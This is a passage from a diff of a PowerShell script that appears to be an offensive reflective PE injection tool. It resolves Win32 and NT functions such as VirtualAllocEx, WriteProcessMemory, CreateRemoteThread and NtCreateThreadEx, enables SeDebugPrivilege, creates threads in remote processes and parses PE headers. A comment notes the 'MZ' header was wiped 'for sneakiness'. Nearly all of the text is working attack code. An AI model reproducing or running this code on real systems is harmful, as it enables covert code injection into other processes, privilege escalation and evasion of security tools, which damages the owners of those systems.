Get-Win32Functions + { + $Win32Functions = New-Object System.Object + + $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc + $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) + $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc + + $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx + $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr]) + $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx + + $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy + $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr]) + $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy + + $memsetAddr = Get-ProcAddress msvcrt.dll memset + $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr]) + $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset + + $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA + $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]) + $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary + + $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress + $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]) + $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress + + $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress #This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself + $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr]) + $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr + + $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree + $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool]) + $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree + + $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx + $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool]) + $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx + + $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect + $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]) + $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate) + $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect + + $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA + $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) + $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) + $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle + + $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary + $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool]) + $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary + + $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess + $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) + $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess + + $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject + $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32]) + $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject + + $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory - - $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory + $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory + + $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool]) $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory - - $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread + $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory + + $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread - - $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread + $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread + + $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool]) $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread - - $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread + + $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool]) $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken - - $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread + $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken + + $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr]) $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread - - $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges + $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread + + $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool]) $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges - - $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA + $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges + + $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool]) $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue - - $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf + $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue + + $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool]) $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf - - # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP + $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf + + # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) { - $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx + $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx } - - $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process + + $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process - - $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread + $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process + + $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr]) $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread - - return $Win32Functions - } - ##################################### - - - ##################################### - ########### HELPERS ############ - ##################################### - - #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function - #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses - Function Sub-SignedIntAsUnsigned - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - $CarryOver = 0 - for ($i = 0; $i -lt $Value1Bytes.Count; $i++) - { - $Val = $Value1Bytes[$i] - $CarryOver - #Sub bytes - if ($Val -lt $Value2Bytes[$i]) - { - $Val += 256 - $CarryOver = 1 - } - else - { - $CarryOver = 0 - } - - - [UInt16]$Sum = $Val - $Value2Bytes[$i] - - $FinalBytes[$i] = $Sum -band 0x00FF - } - } - else - { - Throw "Cannot subtract bytearrays of different sizes" - } - - return [BitConverter]::ToInt64($FinalBytes, 0) - } - - - Function Add-SignedIntAsUnsigned - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - $CarryOver = 0 - for ($i = 0; $i -lt $Value1Bytes.Count; $i++) - { - #Add bytes - [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver - - $FinalBytes[$i] = $Sum -band 0x00FF - - if (($Sum -band 0xFF00) -eq 0x100) - { - $CarryOver = 1 - } - else - { - $CarryOver = 0 - } - } - } - else - { - Throw "Cannot add bytearrays of different sizes" - } - - return [BitConverter]::ToInt64($FinalBytes, 0) - } - - - Function Compare-Val1GreaterThanVal2AsUInt - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [Int64] - $Value1, - - [Parameter(Position = 1, Mandatory = $true)] - [Int64] - $Value2 - ) - - [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) - [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) - - if ($Value1Bytes.Count -eq $Value2Bytes.Count) - { - for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) - { - if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) - { - return $true - } - elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) - { - return $false - } - } - } - else - { - Throw "Cannot compare byte arrays of different size" - } - - return $false - } - - - Function Convert-UIntToInt - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [UInt64] - $Value - ) - - [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) - return ([BitConverter]::ToInt64($ValueBytes, 0)) - } + $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread + + return $Win32Functions + } + ##################################### + + + ##################################### + ########### HELPERS ############ + ##################################### + + #Powershell only does signed arithmetic, so if we want to calculate memory addresses we have to use this function + #This will add signed integers as if they were unsigned integers so we can accurately calculate memory addresses + Function Sub-SignedIntAsUnsigned + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + $CarryOver = 0 + for ($i = 0; $i -lt $Value1Bytes.Count; $i++) + { + $Val = $Value1Bytes[$i] - $CarryOver + #Sub bytes + if ($Val -lt $Value2Bytes[$i]) + { + $Val += 256 + $CarryOver = 1 + } + else + { + $CarryOver = 0 + } + + [UInt16]$Sum = $Val - $Value2Bytes[$i] + + $FinalBytes[$i] = $Sum -band 0x00FF + } + } + else + { + Throw "Cannot subtract bytearrays of different sizes" + } + + return [BitConverter]::ToInt64($FinalBytes, 0) + } + + Function Add-SignedIntAsUnsigned + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + $CarryOver = 0 + for ($i = 0; $i -lt $Value1Bytes.Count; $i++) + { + #Add bytes + [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver + + $FinalBytes[$i] = $Sum -band 0x00FF + + if (($Sum -band 0xFF00) -eq 0x100) + { + $CarryOver = 1 + } + else + { + $CarryOver = 0 + } + } + } + else + { + Throw "Cannot add bytearrays of different sizes" + } + + return [BitConverter]::ToInt64($FinalBytes, 0) + } + + Function Compare-Val1GreaterThanVal2AsUInt + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [Int64] + $Value1, + + [Parameter(Position = 1, Mandatory = $true)] + [Int64] + $Value2 + ) + + [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1) + [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2) + + if ($Value1Bytes.Count -eq $Value2Bytes.Count) + { + for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--) + { + if ($Value1Bytes[$i] -gt $Value2Bytes[$i]) + { + return $true + } + elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i]) + { + return $false + } + } + } + else + { + Throw "Cannot compare byte arrays of different size" + } + + return $false + } + + + Function Convert-UIntToInt + { + Param( + [Parameter(Position = 0, Mandatory = $true)] + [UInt64] + $Value + ) + + [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value) + return ([BitConverter]::ToInt64($ValueBytes, 0)) + } Function Get-Hex @@ -892,2009 +894,1990 @@ $RemoteScriptBlock = { return $Hex } - - - Function Test-MemoryRangeValid - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [String] - $DebugString, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $PEInfo, - - [Parameter(Position = 2, Mandatory = $true)] - [IntPtr] - $StartAddress, - - [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)] - [IntPtr] - $Size - ) - - [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size)) - - $PEEndAddress = $PEInfo.EndAddress - - if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true) - { - Throw "Trying to write to memory smaller than allocated address range. $DebugString" - } - if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true) - { - Throw "Trying to write to memory greater than allocated address range. $DebugString" - } - } - - - Function Write-BytesToMemory - { - Param( - [Parameter(Position=0, Mandatory = $true)] - [Byte[]] - $Bytes, - - [Parameter(Position=1, Mandatory = $true)] - [IntPtr] - $MemoryAddress - ) - - for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++) - { - [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset]) - } - } - - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-DelegateType - { - Param - ( - [OutputType([Type])] - - [Parameter( Position = 0)] - [Type[]] - $Parameters = (New-Object Type[](0)), - - [Parameter( Position = 1 )] - [Type] - $ReturnType = [Void] - ) - - $Domain = [AppDomain]::CurrentDomain - $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate') - $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) - $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) - $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) - $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) - $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') - $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) - $MethodBuilder.SetImplementationFlags('Runtime, Managed') - - Write-Output $TypeBuilder.CreateType() - } - - - #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/ - Function Get-ProcAddress - { - Param - ( - [OutputType([IntPtr])] - - [Parameter( Position = 0, Mandatory = $True )] - [String] - $Module, - - [Parameter( Position = 1, Mandatory = $True )] - [String] - $Procedure - ) - - # Get a reference to System.dll in the GAC - $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | - Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } - $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') - # Get a reference to the GetModuleHandle and GetProcAddress methods - $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') - $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') - # Get a handle to the module specified - $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) - $tmpPtr = New-Object IntPtr - $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - - # Return the address of the function - Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) - } - - - Function Enable-SeDebugPrivilege - { - Param( - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Functions, - - [Parameter(Position = 2, Mandatory = $true)] - [System.Object] - $Win32Types, - - [Parameter(Position = 3, Mandatory = $true)] - [System.Object] - $Win32Constants - ) - - [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke() - if ($ThreadHandle -eq [IntPtr]::Zero) - { - Throw "Unable to get the handle to the current thread" - } - - [IntPtr]$ThreadToken = [IntPtr]::Zero - [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - if ($Result -eq $false) - { - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN) - { - $Result = $Win32Functions.ImpersonateSelf.Invoke(3) - if ($Result -eq $false) - { - Throw "Unable to impersonate self" - } - - $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken) - if ($Result -eq $false) - { - Throw "Unable to OpenThreadToken." - } - } - else - { - Throw "Unable to OpenThreadToken. Error code: $ErrorCode" - } - } - - [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID)) - $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid) - if ($Result -eq $false) - { - Throw "Unable to call LookupPrivilegeValue" - } - - [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES) - [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize) - $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES) - $TokenPrivileges.PrivilegeCount = 1 - $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID) - $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED - [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true) - - $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero) - $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value - if (($Result -eq $false) -or ($ErrorCode -ne 0)) - { - #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set - } - - [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem) - } - - - Function Create-RemoteThread - { - Param( - [Parameter(Position = 1, Mandatory = $true)] - [IntPtr] - $ProcessHandle, - - [Parameter(Position = 2, Mandatory = $true)] - [IntPtr] - $StartAddress, - - [Parameter(Position = 3, Mandatory = $false)] - [IntPtr] - $ArgumentPtr = [IntPtr]::Zero, - - [Parameter(Position = 4, Mandatory = $true)] - [System.Object] - $Win32Functions - ) - - [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero - - $OSVersion = [Environment]::OSVersion.Version - #Vista and Win7 - if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2))) - { - #Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress" - $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero) - $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() - if ($RemoteThreadHandle -eq [IntPtr]::Zero) - { - Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError" - } - } - #XP/Win8 - else - { - #Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress" - $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero) - } - - if ($RemoteThreadHandle -eq [IntPtr]::Zero) - { - Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop - } - - return $RemoteThreadHandle - } - - - - Function Get-ImageNtHeaders - { - Param( - [Parameter(Position = 0, Mandatory = $true)] - [IntPtr] - $PEHandle, - - [Parameter(Position = 1, Mandatory = $true)] - [System.Object] - $Win32Types - ) - - $NtHeadersInfo = New-Object System.Object - - #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness - $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER) - - #Get IMAGE_NT_HEADERS - [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew)) - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr - $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64) - - #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen. - if ($imageNtHeaders64.Signature -ne 0x00004550) - { - throw "Invalid IMAGE_NT_HEADER signature." - } - - if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC') - { - $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value 